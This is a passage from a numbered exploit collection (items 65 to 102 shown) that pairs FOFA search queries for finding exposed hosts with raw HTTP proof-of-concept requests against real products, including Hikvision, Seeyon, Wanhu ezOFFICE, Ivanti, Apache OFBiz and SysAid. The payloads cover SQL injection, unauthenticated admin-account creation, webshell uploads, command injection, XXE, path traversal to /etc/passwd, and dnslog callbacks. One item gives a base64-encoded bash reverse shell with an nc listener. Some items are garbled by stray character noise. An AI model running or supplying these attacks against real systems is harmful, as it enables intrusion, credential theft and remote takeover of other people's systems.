FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. Youkate (优卡特) 脸爱云 facial-recognition smart management platform 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets the file extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu (万户) ezEIP success.aspx command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

( V/ _( T7 W9 R1 U4 L& w+ x71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
4 ^6 y! D6 p7 b ^FOFA:body="PM2项目管理系统BS版增强工具.zip"
u1 o' i( @3 J0 v2 K% s8 i8 {3 pGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
5 p% S0 z( z3 l) ?Host: x.x.x.xx.x.x.x
9 j6 v9 C- X q! J8 }User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36/ l. \! _. e8 d. S
Connection: close' ^: \' P9 _1 J+ b& I' Z' D% D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 ~3 F s `8 P% i; x# i" M
Accept-Encoding: gzip, deflate8 k% } Z5 P* |- e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ F. H7 ?; v: N- ^! n3 w9 m0 e& tUpgrade-Insecure-Requests: 11 ]6 s8 q* K/ e2 b! z
0 N. P! M& ^+ F# U/ L: H2 S
6 b0 ? P* l8 u% ?4 N; M0 y
72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-Server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) campus service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Suda (速达) Tianyao software DesignReportSave.jsp interface arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. Sifudi (思福迪) LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"
POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-Premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The exploit request is shown below; it plants a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese TOSEI self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAPPSecurity (安恒) Mingyu security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. DBAPPSecurity (安恒) Mingyu security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

" J& p. o1 `" j+ ^92. 海康威视运行管理中心session命令执行
% O) \ l+ y( H/ ]Fastjson命令执行
2 u6 `1 S5 E+ m8 T: m' ^: o9 Xhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
& }" t" \9 G2 a# dPOST /center/api/session HTTP/1.1
0 k1 g: ]5 P/ O$ r+ eHost:0 J0 @$ R6 M% p$ z% u3 q) i
Accept: application/json, text/plain, */*
. \+ V; y' @2 S- ^3 HAccept-Encoding: gzip, deflate
& y% c* ^5 X! o7 z6 _6 v5 JX-Requested-With: XMLHttpRequest
7 z& Z& d) r5 s/ f: ]) L' iContent-Type: application/json;charset=UTF-8
7 ^- y2 r1 \+ Q; ^+ e6 oX-Language-Type: zh_CN! ?+ Q% g& L: Z! }" }
Testcmd: echo test
$ X+ r) ~" f$ M5 c% iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
- M( |9 A/ e, J8 e, E* wAccept-Language: zh-CN,zh;q=0.9
& o" \( r4 g& a3 \) D6 Z$ wContent-Length: 5778( |5 D* X" `) H% K3 @8 b5 ^( l# g
5 Y- J2 Y5 D1 e' E0 J# _' T
PAYLOAD6 n, X( U$ q, Y. C4 J3 K8 |
& j9 C- d7 @1 m. r; A' l% t
93. QiAnXin (奇安信) Wangshen SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. QiAnXin (奇安信) Wangshen SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

